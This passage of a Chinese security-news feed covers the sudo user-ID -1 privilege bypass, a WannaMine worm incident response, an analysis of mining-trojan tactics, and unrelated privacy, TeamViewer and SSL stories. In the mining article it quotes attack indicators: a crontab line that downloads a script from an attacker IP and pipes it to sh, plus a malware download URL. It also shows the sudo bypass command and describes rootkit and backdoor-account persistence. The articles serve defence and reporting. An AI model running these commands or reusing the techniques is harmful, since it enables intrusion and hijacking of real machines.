实际上会返回 0。这是因为 sudo命令本身就已经以用户 ID 为0 运行,因此当 sudo 试图将用户 ID 修改成 -1时,不会发生任何变化。这就导致 sudo 日志条目将该命令报告为以用户 ID 为 4294967295而非 root (或者用户ID为 0)运行命令。此外,由于通过–u 选项指定的用户 ID 并不存在于密码数据库中,因此不会运行任何 PAM 会话模块。如果sudoers 条目被写入允许用户以除 root 身份以外的用户身份运行命令,则可利用该 bug 绕过该限制。例如,给定如下 sudoers 条目:

myhost bob = (ALL, !root) /usr/bin/vi

用户 bob 被允许以除了 root以外的其它用户身份运行 vi。然而,由于存在该漏洞,bob 实际上能够通过运行 sudo –u#-1 ui 的方式以 root 身份运行 vi,从而违反了安全策略。只有Runas 规范中存在关键字 ALL 的sudoers 条目受影响。例如,如下sudoers 条目并不受影响:

myhost alice = /usr/bin/id

在这个例子中,alice仅被允许以 root身份运行 id 命令。任何以其它用户身份运行该命令的尝试都将遭拒绝。

影响版本

1.8.28之前的所有 Sudo 版本均受影响。

修复方案

Sudo 1.8.28 版本已修复该漏洞。强烈建议 Linux用户将 sudo包手动更新至最新版本。

9999.jpg

]]>
六小时处置挖矿蠕虫的内网大规模感染事件 Wed, 23 Oct 2019 22:13:00 +0800 一、应急服务背景

2019年5月,安天接到某重要单位的求助,其内网中执行任务的上百台主机频繁出现死机、重启、蓝屏等现象,用户原部署使用的某款杀毒软件能查出病毒告警,但显示成功清除后,病毒很快会重新出现。用户尝试采用其他工具进行处理,未能解决问题,遂向我们寻求帮助。在电话远程协助用户处置的同时,我们派出由安全服务工程师、智甲终端防御系统产品支持工程师组成的应急服务小组,携智甲终端防御系统安装盘、便携式探海威胁检测系统、拓痕应急处置工具箱,及最新病毒库、补丁包等配套资源,于接到求助当日傍晚飞抵用户现场进行处置,快速解决了问题。

二、现场信息采集观测和研判

工程师到达现场后,快速与用户进行了交流研判,共同确定了基于部署探海进行流量侧的监测分析、通过拓痕进行端点的信息采集和证据固化,制定合理安全配置加固策略,全面安装智甲终端防御系统,实现所有终端安全策略加固、统一补丁安装和全网查杀的处置流程。

应急服务小组在协助用户配置交换机镜像设置后,通过探海发现了大量内网扫描和基于永恒之蓝漏洞的攻击流量,以及匹配到威胁情报规则标记为矿池的域名连接请求,又通过拓痕应急处置工具对感染主机进行了扫描、对可疑文件与关联信息进行提取,结合用户已采集安全日志和其他工具,协助用户完成了证据固化。工程师初步判定出,这是一起WannaMine挖矿蠕虫,通过永恒之蓝漏洞,反复传播感染事件。应急服务小组根据预案,在严格执行用户“样本文件不离场”的要求下,前后台快速协同联动,在征得用户同意后,仅将扫描发现的病毒名称、样本HASH等信息通报给我们的应急响应中心(以下简称安天CERT),进行分析支持和研判验证。我们从支撑平台提取相同HASH的样本,结合已有分析验证,在事件机理成因方面,与进场服务小组作出完全一致的判断:由于用户侧部署的原有杀毒软件无法有效支持补丁升级、且没有主机策略配置加固,导致病毒被清除后,会继续通过漏洞重新打入,致使感染源始终存在,其中部分用户终端在被永恒之蓝漏洞攻击中会蓝屏。对此,应急服务小组基于全网终端安装智甲和统一扫描,并部署智甲软件管理中心,全面提取了相关信息,分析确认了病毒最早的出现日期,为用户定位该批设备的最初感染源提供了信息支撑。

制定加固策略、分发安全补丁、查杀终端威胁该蠕虫的传播机理为:迅速利用EternalBlue(“永恒之蓝”)漏洞在局域网内传播自身,形成更加庞大的挖矿网络。该漏洞使用445端口传播,对应补丁为MS17-010。如果主机没有安装相应补丁或关闭相关端口,则无法阻挡该病毒在内网中的渗透传播。根据智甲检测日志,出现病毒感染、蓝屏等故障的主机均未安装MS17-010补丁。

应急服务小组调研了用户现有业务系统所采用的通讯端口、协议等情况,对用户将端点做了初步分组,对默认安全策略模板(参考STIG标准)进行了部分定制调整。之后借助管理中心启动了补丁统一分发、策略调整和统一查杀。经工程师连夜不间断奋战,在到场六小时后将一百多台染毒主机、全部完成了对应补丁升级、安全策略加固和病毒查杀工作。

三、深度分析支持和支持归零复盘

后端分析团队基于样本HASH进行了深度分析并于第一时间为用户提供了WannaMine挖矿病毒样本的详细分析报告。(详见附录一)

在现场病毒情况得到控制的同时,该单位相关负责人希望我们能够在其实验环境中复现该病毒的攻击过程。工程师根据事发现场的情况搭建了模拟环境,根据处置前固化的感染系统端点镜像,模拟现场情况并恢复了相关环境,提供了探海检测系统生成监测日志、并进行录包,指导用户通过Wireshark对数据包进行解析观察,在实验环境中复现了整体攻击过程和具体故障表现,为用户后续对事件进行归零复盘提供了依据。

应急服务小组协助用户完成最终判定,这是一起由第三方设备带毒入网导致的安全事件,昭示出供应链安全侧的安全风险。

四、用户评价

本次应急事件处理完成后,我们受邀参加了该单位针对此事件的归零报告评审会议,用户对本次安全事件十分重视,单位领导对我们的应急响应处置能力、技术支持水平及智甲等产品的查杀和防御能力给予了高度评价,同时提出了和我们建立长期的安全服务关系,并采购了探海和智甲产品。

五、应急处置方案及后续安全建议

5.1 应急处置方案

我们的安全服务中心提示,通过智甲终端防御系统可以实现内网端点系统统一补丁升级、安全加固策略配置和病毒统一查杀。

在没有我们的智甲部署的情况下,遇到蠕虫反复感染对应问题的用户建议采取以下缓解措施:

1) 对局域网内的所有主机采取断网操作。

2) 根据受感染终端的操作系统版本和相关病毒所使用功能的漏洞信息,安装对应的安全补丁

3) 在不影响用户业务的前提下封堵445常见等传播端口,通过杀毒工具进行查杀。

4) 逐步恢复网络并通过抓包工具确认网内是否存在恶意流量,并对全网终端安全状态进行确认。

5.2 后续安全建议

本次事件主要是由于第三方厂家提供的设备带毒入网后引起的病毒内网传播感染事故,是一起典型的由供应链引起的病毒感染传播事件,我们对用户提出了后续安全建议:

1. 技术方面

1) 所有第三方提供的设备在入网前需进行严格的上线检测,至少应采取安全配置检查、恶意代码检测排查、漏洞修复以及配置加固等手段,对入网设备的安全合规性进行严格审查。

2) 设备上承载的操作系统、数据库、中间件及应用等应通过官方渠道或经认证的安全下载渠道获取,避免通过非官方渠道获取引入潜在的安全风险。

3) 针对已上线设备的应用软件、数据及系统的安装与更新,应建立内部统一部署平台,统一补丁源,实现验证留存,应通过带有恶意代码检测和安全验证机制的辅助检测系统的摆渡中间机进行数据交换。

4) 设备最终交付上线前,应使用病毒防护软件对其进行全面病毒检查,必要时需要安全专家协助,确保当前设备的安全状态后方可上线。

5) 因设备上线后的运转状态相对稳定,很少进行更新和修改,应配置白名单防御策略,为系统建立参考STIG标准的配置策略,保证系统上线后的运行安全。

6) 建议依托专业的安全服务团队提升安全事件的应急响应能力。一旦出现安全问题,能够在第一时间采取正确措施,为专业团队现场处置提供初步的威胁排查方法及处置建议。

2. 管理方面

1) 开展内部与外部供应链审查工作,政企机构不仅需审查自身内部的基础架构,还应对供应商及合作伙伴进行审查。虽然内部系统可能具有一系列安全措施用以阻止各种网络攻击,但第三方合作伙伴可能在此阶段缺少有效的防御手段。因此,需要对软硬件供应商开展彻底审查工作,只有通过审查后才能将其提供的软硬件、系统等集成至内部基础架构中。

2) 在条件允许的情况下,用户应要求供应商遵循最小暴露面的原则,制定相关流程、标准和法务协议,对用户作出入网设备的明确的安全规格需求。协议应要求供应商及时通告任何内部安全事件以及定期进行安全报告,以确保其安全状态,并培养供应商开发人员安全意识,同时通过可信的正规渠道发布软件产品,通过数字签名认证机制使软件遭到外部篡改、病毒感染等攻击等情况易于被发现。

3) 定期对用户内部员工及第三方供应商开展安全培训工作,分享供应链安全最佳实践。

3. 安全产品和工具使用方面

1) 安天资产安全运维平台智甲终端防御系统组合部署使用,可以实现统一内网端点资产管理、统一内网补丁分发升级、支持安全等级分组的模板化安全策略加固。

2) 智甲通过我们的下一代威胁检测引擎可以精准检测海量病毒,对Rootkit、感染式病毒、扫描蠕虫、宏病毒等困扰内网用户的事件有良好的处理效果。同时借助主防机制和分布式主机防火墙,能有效拦截针对端点的各种攻击。

3) 基于探海威胁检测系统部署,可以通过我们的下一代威胁检测引擎精准检测恶意代码传播,可以及时发现内网扫描、横向移动等攻击动作。

4) Antiy追影安全分析系统可以增加安全分析的深度,发现漏洞利用,呈现威胁行为,并生产可利用威胁情报。

5) Antiy拓痕处置工具可以针对主机系统进行定期安全检查、应急检查、证据固化和风险文件提取,进行主机侧的深度分析处置。

对规模化的高价值信息资产防护,仅仅依靠产品组合使用无法保证安全,应以叠加演进模型,进行能力导向的安全规划建设,依次做好基础结构安全、纵深防御、态势感知与积极防御、威胁情报等安全工作,建设动态综合安全防御体系。

附录一:WannaMine蠕虫样本分析报告

安天CERT分析小组,根据应急服务小组所提供的样本HASH值,通过安天“赛博超脑”分析平台提取了样本进行分析。通过对病毒样本进行逆向分析发现,其属于WannaMine挖矿病毒的变种版本。WannaMine是一款旨在挖掘Monera加密货币的蠕虫病毒。WannaMine变种会最大限度的利用CPU来挖掘Monera加密货币,使应用程序以及系统崩溃。当用户感染WannaMine变种之后,WannaMine变种会迅速利用EternalBlue(“永恒之蓝”)漏洞在局域网内传播自身,形成更加庞大的挖矿网络。

原文件名spoolsv.exe
病毒名称Trojan/Win32.TSGeneric
MD597911A1DA380F874393CF15982C6B1B9
处理器架构Intel 386 or later processors and compatible processors
文件大小494 KB
文件格式Win32 EXE
时间戳2018-05-03 11:09:29
VT首次上传时间2018-05-04
VT检测结果48/67

表1样本标签

一、 样本传播方式

图 1 样本传播方式

样本中spoolsv.exe(以下称为spoolsv.exe_A)对EnrollCertXaml.dll进行解密,得到wmassrv.dll。wmassrv.dll是主服务,会在C:\Windows\SpeechsTracing\Microsoft\目录下生成NSA漏洞利用工具,在C:\Windows\System32\目录下生成HalPluginsServices.dll。wmassrv服务启动后会调用HalPluginsServices.dll,HalPluginsServices.dll会启动spoolsv.exe_A。spoolsv.exe_A会对局域网进行445端口扫描,确定可攻击的内网主机,然后启动挖矿程序以及漏洞攻击程序svchost.exe和spoolsv.exe(另外一个病毒文件,以下称为spoolsv.exe_B);svchost.exe执行“永恒之蓝”漏洞对可攻击的内网主机进行漏洞溢出攻击,成功后spoolsv.exe_B(NSA黑客工具包DoublePulsar后门)在攻击成功的主机上安装后门,加载payload(x86.dll/x64.dll);payload执行后,负责将EnrollCertXaml.dll从本地复制到受害主机,再解密该文件,注册wmassrv.dll为服务,启动spoolsv.exe_A执行攻击。

二、 样本的危害范围与危害程度

1. 样本危害范围

本次任务获取的样本利用了“永恒之蓝”漏洞,该漏洞利用的操作系统平台为windows,从该样本释放的载荷分析发现了针对32位和64位不同操作系统的执行程序(X86.dll以及X64.dll),同时对样本代码进行逆向分析发现,该样本只会在局域网的同一网段上传播,不会跨网段扩散。(注:“永恒之蓝”是美国国家安全局开发的漏洞利用程序,是方程式组织在其漏洞利用框架中的一个针对SMB服务进行攻击的模块。“永恒之蓝”利用了MS17-010漏洞,该漏洞可以让攻击者在目标系统上执行任意代码。2017年5月份爆发的WannaCry蠕虫病毒便是利用“永恒之蓝”进行传播的。)

spoolsv.exe_A运行后会对C:\Windows\System32\EnrollCertXaml.dll进行解密操作,解密后的文件wmassrv.dll会生成NSA漏洞利用工具集和HalPluginsServices.dll。

图 2 漏洞攻击工具集

spoolsv.exe_A会将wmassrv.dll注册为服务。该服务由svchost.exe启动,启动后wmassrv.dll会注入到svchost.exe进程中。

图 3将wmassrv.dll注册为服务

图 4 服务wmassrv

spoolsv.exe_A会获取主机IP,扫描主机所在的内网网段(%d.%d.%d.*),判断内网中是否有主机开启了445端口。如果发现局域网内有主机开启了445端口,就将相应的IP地址和端口号写入到“永恒之蓝”攻击程序svchost.exe的配置文件svchost.xml中。然后spoolsv.exe_A启动svchost.exe(“永恒之蓝”攻击程序)对局域网内的主机进行攻击,同时将行为特征记录到stage1.txt。

图 5 扫描局域网内主机

“永恒之蓝”漏洞利用程序攻击结束之后,spoolsv.exe_A会修改DoublePulsar后门程序spoolsv.exe_B的配置文件spoolsv.xml,然后启动spoolsv.exe_B(NSA黑客工具包DoublePulsar)安装后门程序,同时将行为特征记录到stage2.txt。

图 6 将攻击记录到stage2.txt

wmassrv.dll生成的NSA漏洞利用工具集中包含payload文件x86.dll和x64.dll,spoolsv.exe_B会根据受害主机的操作系统执行不同的payload。payload执行后,会将EnrollCertXaml.dll复制到受害主机,然后将wmassrv.dll安装为服务。服务安装后,可以启动spoolsv.exe_A,进行新一轮的漏洞利用与payload加载。

2. 样本危害程度

WannaMine变种沿用WannaMine的传播方式,利用了MS17-010漏洞的便利,使用“永恒之蓝”漏洞利用程序在局域网中迅速传播,导致局域网中的主机都在挖矿。WannaMine变种的矿池站点仍然指向nicehash.com、minergate.com。

相关样本攻击载荷落地后会即时发起攻击,没有潜伏期。在实验环境复现的过程中,被攻击主机的现象也是即时发生的,继而验证了病毒的即时发作特性。同时,局域网主机感染了该挖矿病毒后会相互进行永恒之蓝漏洞攻击,漏洞利用过程中使用了堆喷射技术,因此一定概率会导致漏洞利用失败导致被攻击主机蓝屏重启等现象。

9999.jpg

]]>
生存还是毁灭?一文读懂挖矿木马的战略战术 Wed, 23 Oct 2019 22:13:00 +0800 前言

比特币等虚拟货币在2019年迎来了久违的大幅上涨,从最低3000美元上涨至7月份的14000美元,涨幅达300%,巨大的金钱诱惑使得更多的黑产团伙加入了恶意挖矿的行列。阿里云安全团队通过对云上僵尸网络家族的监控,发现恶意挖矿已成为黑产团伙主要的牟利方式。2019年共监控到58个成规模的挖矿木马团伙(数据截止到8月底),以累积感染量定义木马活跃度,下图/表是活跃TOP10的木马家族及简介。本文尝试从宏观角度分析、总结挖矿木马常用技术及发展趋势,以期能够给企业安全防护带来启示。



核心观点


1.木马投放方式全面蠕虫化,多种漏洞组合攻击成为趋势,N-day漏洞利用速度在加快


这种趋势无疑令人异常担忧,意味着挖矿木马的传播能力在大幅增强,变得无孔不入。一旦企业的信息系统存在任意可被利用的漏洞,那么企业内网将会快速沦陷,挖矿行为会抢占CPU资源,严重影响企业信息系统运行。这对企业的漏洞管理和安全防御能力有了更高、更快的要求。


2.木马持久化技术被成熟利用,rootkit、无文件技术成为趋势


挖矿木马入侵成功后必定希望能够长久稳定的挖掘出虚拟货币,其技术上使用rootkit、无文件等技术实现长期、隐蔽运行。对于一般的运维人员,系统一旦中招后,顽固木马是难以清除的,这需要企业具备更专业的安全应急响应能力。


3.木马开始出现跨平台趋势


Golang语言天生具备跨平台编译能力,这个特点方便黑产团伙在多平台间移植,新出现的恶意软件使用GO也成为了一种趋势。TOP10中有6个是2019年爆发的挖矿木马,其中有5个是GO语言实现的,MinerGuard和kworkerds已具备了Linux/Windows双平台传播的能力。


工欲善,利其器-攻击之术


全网漏洞扫描/投放->蠕虫化投放


1、利用单一或多个IP攻击全网漏洞进行投放


这种投放方式较为原始,无横向传播能力,效率比较低下,且容易被防御拦截。在我们的监控中,使用这种方式的木马规模普遍较小。例如:8220Miner固定使用多个国外IP进行持续攻击,会定期更换IP,但更换频率较低。而ddsMiner通过sqlserver入侵,攻击载荷会下载名为dds.exe的PE文件(如:http://113[.]69[.]206[.]219:4523/dds.exe),该团伙每天至少使用1个新的IP进行全网攻击,攻击时间持续数小时,该IP也是当天的恶意文件托管站。


2、蠕虫化投放


蠕虫化的挖矿botnet具备攻击模块,扫描并感染网络上的其他服务器,使用这种方式进行传播会按照指数增长的速度扩张,且这种方式会使得溯源和防御变得更加困难。TOP10中2019年爆发的几个挖矿botnet全部使用蠕虫化投放方式,他们都是在短时间内(几天时间)得到快速扩张跻身TOP10。


单一漏洞利用->组合漏洞横向传播


早期的挖矿木马使用固定漏洞在公网传播,传播速度和规模受限。而使用多种漏洞组合攻击的方式使得挖矿木马具备了内网横向传播的能力,攻击模块会集成通用的WEB服务漏洞、爆破、数据库漏洞等攻击方式。‘聪明’的挖矿木马作者更是使用不同的内外网攻击策略,进行更高效的传播。例如:Windows平台下的Bulehero挖矿木马,在内网优先使用永恒之蓝漏洞、ipc$爆破、RDP爆破进行传播,在公网则优先使用Web服务漏洞进行传播。Linux平台下的kerberods挖矿木马,在内网优先使用本地ssh key、ssh爆破进行传播。在这种高效策略下,企业内网通常在几分钟内被全部入侵。


N-day漏洞快速利用


互联网大规模存在且未被修复的通用漏洞往往成为挖矿僵尸网络争夺的’肥肉’,N-day漏洞爆发后难以在短时间内得到有效修复,’嗅觉’灵敏的黑产团伙会很快纳入挖矿木马的武器库。据我们观察,N-day漏洞留给运维人员进行修复的空窗期越来越短,如Jboss反序列化漏洞于2017年5月被发现,年底JbossMiner开始对其大规模利用。2018年12月ThinkPhp远程代码执行漏洞爆发,十几天后被BuleHero团伙利用进行。2019年4月8日Confluence RCE 漏洞利用POC发布,4月10日就kererods蠕虫就开始利用该漏洞大肆传播,中间只隔了短短两天。再次对云平台及用户的快速响应能力构成严峻考验。


通往财富之路-牟利之术


矿池配置方式:


挖矿木马植入开源挖矿程序进行挖矿,矿机程序启动时通过命令行传入挖矿参数,但是这种方式较为原始,释放出的木马无法修改配置参数。第二种方式使用配置文件下发,结合定时任务实现对挖矿参数的控制,这种使用方式较为常见。以上两种方式都存在易被检测的特点,有些黑产团伙会对开源挖矿程序进行二次开发,将矿机配置参数硬编码在恶意程序中,并进行加壳对抗检测,以达到隐蔽挖矿的目的。


挖矿程序命令行配置



通过配置文件:


MinerGuard矿机配置文件截图:



挖矿软件硬编码配置 :


ddgs硬编码的矿池及钱包地址



挖矿方式:公共矿池->矿池代理


1、公共矿池方式


使用匿名的公共矿池是恶意挖矿最常见的方式,使用方法简单,但是由于需要配置独立的钱包地址,因此易被跟踪溯源,而且对bot挖矿无管理能力。


如下图是在公共矿池上查询8220Miner的钱包地址及算力,目前该地址挖掘到15.5个门罗币,可借此估算出该挖矿僵尸网络的规模。





2、矿池代理


有些挖矿僵尸网络会自己搭建矿池代理,通过代理可降低挖矿难度,也可根据收益随时切换高收益矿池、高收益矿币种,这种方式无法通过钱包地址进行跟踪。


下图是监控到masscanMiner使用了矿池代理进行挖矿,通过进程cmdline可知矿池开放在121.42.151.137的28850端口,这并非一公共矿池常用的端口,登陆账号也为默认账号。



其他变现方式:附带DDos、Socks代理


除了挖矿这种本职工作,有些黑产团伙会顺带通过其他方式进行变现,比如DDos、代理等。如下图是sicMiner恶意样本会运行一个python脚本,该脚本是github上开源的socks5代理,代理运行在7081端口,该团伙可能是通过出售代理进行变现。



生存还是毁灭-持久化之术


挖矿木马入侵成功后需要长期驻留于目标操作系统,以达到长期稳定地产出虚拟货币,通常会使用各种技术对抗安全检测和运维人员的清除。


清除/卸载安全软件


卸载宿主机的安全防护软件是常规操作,由于挖矿的攻击行为多针对服务器,黑产团伙也特别针对云环境的安全软件精准对抗。如下是kworderds蠕虫在windows、Linux下卸载不同安全软件的行为。


kworkerds关闭杀毒软件



kworkerds挖矿蠕虫卸载安骑士等安全工具



rootkit技术


1、通过定时任务/计划任务实现常驻


Linux下的crontab定时任务是很多恶意软件常见的驻留方式,他们并不仅仅会把自己写入用户的crontab,还会写入软件包的crontab,如/etc/cron.d,这样使得自己更不容易被发现。而Windows下则通过计划任务、修改注册表实现类似的驻留方式。如下是ddgs蠕虫恶意进程行为通过crondtab启动。


ddgs通过CROND定时任务启动恶意shell:/bin/sh -c curl -fsSLhttp://218[.]248[.]40[.]228:9999/i.sh?6| sh





2、动态链接库预加载型rootkit


Linux下的动态链接库预加载机制在加载其他常规系统库之前就会预先加载用户定义的动态链接库,如果自定义库的函数与系统库中找到的函数具有相同的名称,自定义动态链接库就会覆盖系统库中的函数。攻击者通过动态连接库预加载,实现对libc中诸如readdir等常用函数的hook,当ps、top等shell指令尝试读取/proc/目录获取进程信息时对恶意进行隐藏。


图是8220miner使用该技术劫持linux动态链接库配置文件/etc/ld.so.preload。





无文件攻击技术


无文件攻击不需要将恶意软件落地到磁盘,因此难以被杀软查杀,具备更好的隐蔽性。在挖矿僵尸网络中通常使用各种工具(比如Windows的WMI命令行工具wmic.exe)或者脚本编程语言(如PowerShell)提供的API接口访问WMI,来实现无文件攻击。如下是TheHidden使用wmic、WannaMine使用powershell进行无文件攻击。


TheHidden使用wmic无文件攻击的代码片段



WannaMine的恶意进程使用powershell隐藏、编码功能进行无文件攻击



文件名/路径混淆


除了对抗各种安全工具,还要对抗运维人员的手动排查,将文件名和路径进行混淆也是常用的手段。比如ibus会将恶意文件写入多个系统目录下,并且通过随机变更大小写等方式生成和隐藏目录下文件名类似的混淆文件名。


ibus生成在系统目录下的混淆目录



ibus生成混淆文件名



c&c通信


由于恶意挖矿行为不需要对bot进行强控制,大部分的挖矿木马都不具备完备的c&c控制模块,他们通常使用配置文件结合定时任务,实现对bot的配置变更和版本更新。在TOP10中只有ddgs和ibus有完备的c&c控制功能。如ddgs,它的c&c通信使用uMsg序列化,能够实现攻击指令下发、版本配置更新等功能,在今年1月份的更新中甚至开始使用P2P进行c&c控制IP的下发。


ddgs反序列化后的c&c控制指令



ibus的c&c控制模块的恶意代码



暗网


从2018年底开始挖矿木马开始频繁使用暗网进行恶意文件托管,由于其匿名通信的特点开始在恶意软件中逐渐流行。如下是watchbog蠕虫使用暗网地址下载恶意文件。


watchbog蠕虫使用暗网地址下载恶意文件。



文件类型伪装


为了防止被追踪溯源,黑客喜欢将恶意文件托管在公开的免费网站上,他们需要将恶意shell、二进制文件伪装成图片以防止被检测。


将二进制/shell文件伪装成图片文件是常规操作



后门账号


除了常规驻留操作,我们监控到多个挖矿木马会在宿主机上留下后门账号,即使木马被清除掉,黑客也能通过后门账号再次入侵。


TheHidden添加后门账号,账号名admin,并对该账号进行了隐藏。





watchdog添加后门ssh key



人在江湖飘怎能不挨刀-资源竞争之术


除了和安全软件的对抗,挖矿僵尸网络还要面临同行的竞争,毕竟CPU资源是有限的,一机不容二’马’!


杀死竞争进程


这几乎是挖矿木马的常规操作,通过进程的指纹库判断其他挖矿进程,或者直接杀死CPU占用率高的进程。


kerberods进行资源竞争的进程指纹库



修改防火墙


修改防火墙的iptables,将存在漏洞的服务端口关闭防止其他挖矿木马入侵。或者关闭常见的矿池端口,阻断竞争对手的挖矿行为。


修改iptables配置进行资源竞争



修改hosts


通过修改/etc/hosts将竞争对手的域名、常见矿池域名sinkhole,也是一种资源竞争手段。我们也见到了对应的反制措施:判断/etc/hosts是否被修改过,并重写/etc/hosts进行覆盖。


将竞争对手的域名sinkhole



kthrotldsPretender的反制措施:重写hosts



借助其他botnet


除了以上常规的竞争手段外,借助其他僵尸网络进行传播也是一种高明的手段。systemdMiner在今年4月份就曾’借鸡下蛋’,通过入侵ddgs的c&c中控主机进行快速扩张。


systemdMiner利用ddgs的中控下发的shell


9999.jpg

]]>
住酒店“被入会” 个人信息要看好 Wed, 23 Oct 2019 22:13:00 +0800 在网上预订酒店,抵达后前台要求微信扫码才能办理入住。在这个过程中,一些客人认为没有必要收集的个人信息也被留存了。近期,一些消费者反映,华住集团旗下有的酒店要求住客使用微信扫码办理入住,实际上却是将住客变成自己的“会员”。由此,住客的身份证、家庭地址、生日、邮箱、账号、密码以及银行账户等信息均可能被收集留存。

公开资料显示,华住集团旗下拥有包括汉庭、全季、美爵、桔子、漫心、海友等多个酒店品牌。记者在北京、上海、厦门等地的相关酒店暗访时发现,客人在前台入住时多被要求使用微信扫码,实际“被入会”。

记者通过携程分别预订了北京、上海、厦门的全季和汉庭酒店客房,在办理入住时,酒店前台要求记者使用微信扫码。

记者注意到,在办理入住的“微信一键登录”按钮下,有一行小字——“我已阅读并同意《华住会员服务条款》和《华住隐私声明》”,如不同意打钩,无法完成入住登记。而一旦打钩,华住则进

一步要求住客提供手机号,并自动为该手机号注册“华住会员”。

华住方面称,今年5月6日正式上线了扫码入住功能,会邀请客人通过扫描二维码的方式成为华住会员,包含门店、线上等所有渠道预订入住的客人。当然,住客也可以自行选择,不通过扫码的方式,在酒店前台人工办理入住。

但记者发现,在办理入住时,一些酒店没有明示或者主动告知“扫码入住即等于入会”,除非住客主动明确提出“微信无法使用”或“不想成为华住会员”。

想用WiFi也必须首先成为会员。记者在暗访中发现,在全季酒店客房内使用免费WiFi功能,同样需要事先勾选一份华住会员相关条款的文件。根据网页提示,一旦勾选同意,华住会自动将住客手机号注册为华住会员。

https://gss0.baidu.com/-4o3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/267f9e2f070828389b8a613cb599a9014c08f117.jpg

注销会籍个人信息也被留存

《华住隐私声明》提出,“您在通过华住网站或移动应用软件使用华住的服务时,我们会要求您提供姓名、性别、身份证、家庭住址、电话号码、生日、邮箱、账号、密码及其他您在选择酒店时的一些偏好以及支付时提供的银行账户或信用卡等信息。”

如果住客发现“被会员”,不希望个人信息留存在华住的服务器上,可否通过注销会籍实现?记者拨打了华住酒店集团官方客服电话,要求客服注销记者的会籍。随后客服表示,即使注销会籍,记者的个人信息也仍将留存在其后台。

华住集团官方客服表示,如“高级会员”需要注销会籍,需向客服邮箱提交会员本人手持身份证清晰照申请办理。

消费提示

信息授权前留意打钩项文字叙述

今年5月,国家互联网信息办公室在《数据安全管理办法(征求意见稿)》中强调:仅当用户知悉收集使用规则并明确同意后,网络运营者方可收集个人信息。

对于是否违规、过度索取住客个人信息,华住集团在接受记者采访时表示,华住集团严格落实国家法律法规相关要求,保护用户信息,并通过技术与管理手段提升安全防护能力。相关人士还表示,将通过内部培训加强门店的相关管理规范。

专家认为,相关法律法规尚不完善,对于企业收集信息如何属于过度、最少够用原则的标准以及如何处罚等方面的规定比较模糊。

此外,专家认为,当前个人信息保护面临的另一个问题是维权难。如果不是专业测评机构或媒体曝光企业超范围收集使用个人信息,不少用户仍被“蒙在鼓里”;企业与个人在博弈中处于不对等地位,即便发现企业违规收集信息,个体消费者起诉企业的成本很高。

中国信息安全研究院副院长左晓栋建议,监管部门可尝试根据相关案件的处理结果,定期向社会公布保护个人信息不力黑名单;同时建立更为有效的用户投诉反馈渠道,对用户反映集中的问题进行集中查处。

专家建议消费者,在使用微信扫码或下载使用APP时要尽量小心,尤其是在信息授权前,要留意打钩项后的文字叙述,对于未明示同意就获取用户授权的,可向当地消协或工信部门投诉。

9999.jpg

]]>
TeamViewer发布官方声明:火眼提到的攻击事件并非最近发生的 Wed, 23 Oct 2019 22:13:00 +0800 全球知名的远程控制软件TeamViewer上周末被爆出安全事件,这起事件源起国外安全公司火眼举办的安全会议。

火眼首席安全架构师在推特上拍摄会议的现场图片,图片列举近些年多起网络攻击事件其中也包括TeamViewer。

这名安全架构师还在推特上表示所有安装TeamViewer的计算机都可能被控制,这条推文迅速引起大量用户恐慌。

值得注意的是火眼发布的图片里标注 2017-2018 年间 ,  蓝点网在此前报道中也提到攻击可能并不是近期发生的。

不过多数媒体报道引用的信息源声称是近期监测到的攻击,于是国内很多使用TeamViewer的用户选择立即卸载。

TeamViewer发布官方声明:


该安全事件被广泛报道后蓝点网也联系TeamViewer团队进行咨询,不过由于周末该公司德国总部并未进行回应。

直到昨天晚间该公司才在社区公布官方声明,在声明中TeamViewer表示火眼安全会议中提到的是历史安全事件。

所以潜在的攻击问题并不会影响现在还在使用TeamViewer的用户,至于具体时间自然指的是 2017~2018 年间。

该公司还联系火眼安全公司对此事件进行澄清,火眼发布的声明也表示TeamViewer近期并未发生潜在安全问题。

TeamViewer发布官方声明:火眼提到的攻击事件并非最近发生的

火眼首席架构师发布的声明:


火眼首席安全架构师作为最新发布消息的人也发布澄清声明,在声明中该架构师表示推文指的是此前的安全事件。

在少数情况下恶意软件是通过TeamViewer进行部署的,也就是火眼图片中展示的通过该软件进行多渠道入侵等。

最后火眼首席架构师强调此前推文指的并不是TeamViewer当前的软件或者是服务器等基础设施遭到攻击者入侵。

TeamViewer发布官方声明:火眼提到的攻击事件并非最近发生的

蓝点网此前消息:


日前知名安全公司火眼(FireEye)首席安全架构师在推特上爆料TeamViewer遭到黑客攻击并泄露用户的账号密码。

这个黑客团体被称为APT41 (高级持续威胁),火眼在推特上称黑客可在任意安装TeamViewer的电脑上进行访问。

从火眼首席安全架构师发布的图片来看这应该是火眼举办的安全会议上展示的演示文稿,火眼并未透露具体细节。

不过这家安全公司是业界知名的安全研究团体,所以发布的消息可信度为百分之百,只是攻击时间暂时无法确定。

因为在展示的图片上关于TeamViewer被黑标注的是2017-2018,按理说这个数字指的应该是攻击发生的时间段。

图片还显示通过该软件进行传送文件的记录,记录显示时间为 2017年7月4日 ,  所以火眼说的应该不是最新攻击。

TeamViewer发布官方声明:火眼提到的攻击事件并非最近发生的

9999.jpg

]]>
大多数 SSL 证书签发错误的主要原因是软件错误 Wed, 23 Oct 2019 22:13:00 +0800 最近的一项学术研究发现,软件错误和对行业标准的误解是大多数错误签发 SSL 证书的最主要原因,其所占比例高达所有错误事件的 42%。这项研究是由印第安纳大学布卢明顿分校信息与计算学院的一个团队撰写的,他们研究了 379 起 SSL 证书签发错误的实例,并总共发现了 1300 多个事件。

研究人员从公共资源收集了事件数据,例如 Mozilla 的 Bugzilla 跟踪器与 Firefox 和 Chrome 浏览器安全团队的网上论坛讨论区。该研究的目的是研究证书颁发机构(CA)如何遵守行业标准,以及 SSL 证书签发错误背后的最常见原因。

研究小组得出了一个结论,即“大多数错误签发 SSL 证书的事件都是由软件错误引起的”。

在他们分析的 379 个案例中,有 91 个(占 24%)是由 CA 的一个软件平台中的软件错误引起的,导致客户收到不兼容的 SSL 证书。

第二个最常见的原因是 CA 误解了 CA/B 论坛规则,或者 CA 不知道规则已更改,有 69 起案件是这种情况,占所有 SSL 证书签发错误事件的 18%。

而恶意根 CA 导致的问题数据占比排在第三位,有 52 个 SSL 证书签发错误案例(占所有分析事件的 14%)是 CA 故意作恶,为了利润而破坏了行业规则,比如他们会给中间人攻击者出售证书。

ca-research.pngca-research-causes.png

第四大最常见的原因是人为错误,有 37 例(占总数的 10%)。

第五位是操作错误,其中错误是由于 CA 的内部程序错误,而不是软件或人为错误,这占了 29 例,占所有案例的 8%。

